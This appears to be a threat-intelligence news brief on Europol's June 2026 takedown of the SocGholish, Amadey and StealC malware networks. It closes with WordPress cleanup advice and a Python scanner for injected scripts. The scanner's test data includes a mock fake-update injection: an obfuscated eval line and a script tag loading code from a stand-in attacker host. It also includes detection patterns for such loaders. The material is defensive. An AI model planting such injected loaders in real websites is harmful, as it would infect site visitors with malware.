At a Glance
| Item | Detail |
|---|---|
| Actor / group | SocGholish operator (TA569), linked to Russia’s Evil Corp; Amadey and StealC malware-as-a-service crews |
| Activity type | Malware loaders and an infostealer used to seed ransomware and fraud |
| Targets / victims | Windows users worldwide; nearly 15,000 hacked websites, many on WordPress |
| Scale (claimed) | EUR 41M in crypto flagged; 27M credentials recovered; 326 servers taken down |
| Law-enforcement status | Infrastructure seized; Microsoft filed a civil suit against alleged operators |
| Source | Europol press release, 24 June 2026 |
TL;DR
Europol and global partners struck three malware networks under Operation Endgame. The action hit SocGholish, Amadey, and StealC across 326 servers. Police also flagged EUR 41 million in crypto and recovered 27 million stolen credentials.
What Happened
On 24 June 2026, Europol announced a new Operation Endgame wave. In two weeks, investigators took down 326 servers and 142 domains. Europol called the move a “landmark blow to cybercriminal networks.” The goal was to disrupt the “assembly lines” cybercriminals use to get into victim networks. Microsoft, ESET, Proofpoint, and other firms joined the effort. Together, they seized infrastructure that fed ransomware and fraud.
The tools ran on a “cybercrime-as-a-service” model. Affiliates rented them to break into target systems.
How the three tools fit together
Each tool played a clear role. SocGholish and Amadey opened the door to victim systems. StealC then harvested passwords, cookies, and crypto wallets.
Who Is Behind It
The SocGholish malware loader sits at the center of this story. SocGholish has operated since at least 2018. It works as an initial access broker for ransomware crews: it lands on a victim machine first and then sells or hands off that access. Europol links SocGholish to the Russian group Evil Corp. That crew is also behind the older Dridex banking malware and grew out of the earlier Zeus and GameOver Zeus operations. Researchers track the SocGholish operator as TA569.
Microsoft also sued several alleged Amadey and StealC operators. Authorities have not named those suspects publicly.
Impact and Scale
The numbers show the operation’s reach. Police remediated 14,971 hacked websites that were serving SocGholish. Many of these were WordPress sites run by small businesses. Europol said officers took 326 servers offline, “severely crippling the malware’s distribution network.” Per Microsoft, Amadey and StealC hit over 140,000 computers in early May 2026. Microsoft also identified thousands of victim machines and began working with internet providers to protect those users. The EUR 41 million in flagged crypto and the 27 million recovered credentials are Europol’s own figures.
What Comes Next and How to Stay Protected
Operation Endgame is not finished. Past phases led to arrests and more server seizures. Meanwhile, SocGholish operators may rebuild fast. Their infrastructure often rotates every few days. So defenders should expect fresh domains soon.
For WordPress site owners
Site owners face the most urgent cleanup. First, change all admin passwords right away. Next, enable multi-factor authentication on every account. Then delete any unknown admin users. Finally, update WordPress core, themes, and plugins.
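Before resetting passwords and pruning admin users, a site owner needs to find where the fake-update loader was planted. The script below is an added example, not tooling from Europol, Microsoft, or the other partners: it walks a WordPress document root and flags two things, `<script src>` tags that pull from a host outside an allowlist, and inline `<script>` blocks that decode and execute code at page load (`eval`, `String.fromCharCode`, `atob`, `document.write`). The allowlist, the pattern set, and the sample files are assumptions made for the example; the "attacker" host uses the reserved `.invalid` TLD and is not a real indicator.

```python
import re
import tempfile
from pathlib import Path

# Assumption: the site's own host plus the CDNs its theme legitimately loads from.
# A real deployment would build this list from the site's known-good templates.
ALLOWED_HOSTS = {"example.com", "www.example.com", "cdnjs.cloudflare.com"}

# <script ... src="https://host/..."> or protocol-relative src="//host/...".
# Same-origin relative paths (src="/wp-content/...") deliberately do not match.
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s>?#]+)", re.I)
# Inline <script>...</script> bodies whose opening tag carries no src attribute.
INLINE_SCRIPT = re.compile(
    r"<script\b(?![^>]*\bsrc\s*=)[^>]*>(.*?)</script>", re.I | re.S)
# Constructs that rarely belong in a theme template but are typical of injected
# loaders that decode and execute their real payload when the page loads.
OBFUSCATION = re.compile(
    r"String\.fromCharCode|\beval\s*\(|\batob\s*\(|document\.write\s*\(|\bunescape\s*\(",
    re.I)
SCAN_SUFFIXES = {".php", ".html", ".htm"}


def scan_text(text, allowed=ALLOWED_HOSTS):
    """Return [(finding_type, detail), ...] for one template file or one post body."""
    findings = []
    for m in SCRIPT_SRC.finditer(text):
        host = m.group(1).lower()
        if host not in allowed:
            findings.append(("external-script", host))
    for m in INLINE_SCRIPT.finditer(text):
        hit = OBFUSCATION.search(m.group(1))
        if hit:
            findings.append(("obfuscated-inline", hit.group(0)))
    return findings


def scan_tree(root, allowed=ALLOWED_HOSTS):
    """Walk a WordPress document root and map each suspicious file to its findings."""
    root = Path(root)
    report = {}
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        hits = scan_text(path.read_text(errors="replace"), allowed)
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


# Constructed samples, not real site content: a clean footer and a header carrying
# a fake-update style injection (the attacker host uses the reserved .invalid TLD).
CLEAN_FOOTER = """<?php wp_footer(); ?>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
</body></html>
"""
INJECTED_HEADER = """<?php wp_head(); ?>
<script>var s=['\\x73\\x72\\x63'];eval(String.fromCharCode(100,111,99,117,109,101,110,116));</script>
<script src="//attacker.invalid/update.js"></script>
"""


def demo():
    """Write the samples into a throwaway WordPress-shaped tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "wp-content" / "themes" / "site"
        theme.mkdir(parents=True)
        (theme / "footer.php").write_text(CLEAN_FOOTER)
        (theme / "header.php").write_text(INJECTED_HEADER)
        return scan_tree(tmp)


if __name__ == "__main__":
    for name, hits in demo().items():
        print(name)
        for kind, detail in hits:
            print(f"  {kind}: {detail}")
```

Run it against the real document root (`scan_tree("/var/www/html")`) after exporting post bodies to `.html` files, since injected loaders also land in `wp_posts` and `wp_options`, not only in theme files. Treat every hit as something to verify by hand: a legitimate plugin can load from an unlisted CDN, so the allowlist should be tuned from a known-clean copy of the theme before trusting the report. Only once the injected code is gone do the password reset, MFA rollout, admin-user review and updates stop the attacker from simply re-injecting it.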
For everyday users
Regular users should distrust browser update pop-ups, which is exactly how SocGholish lures its victims. Real browser updates arrive through the browser’s own settings page or the app store, never through a prompt on a website. For the full picture, read Europol’s official announcement.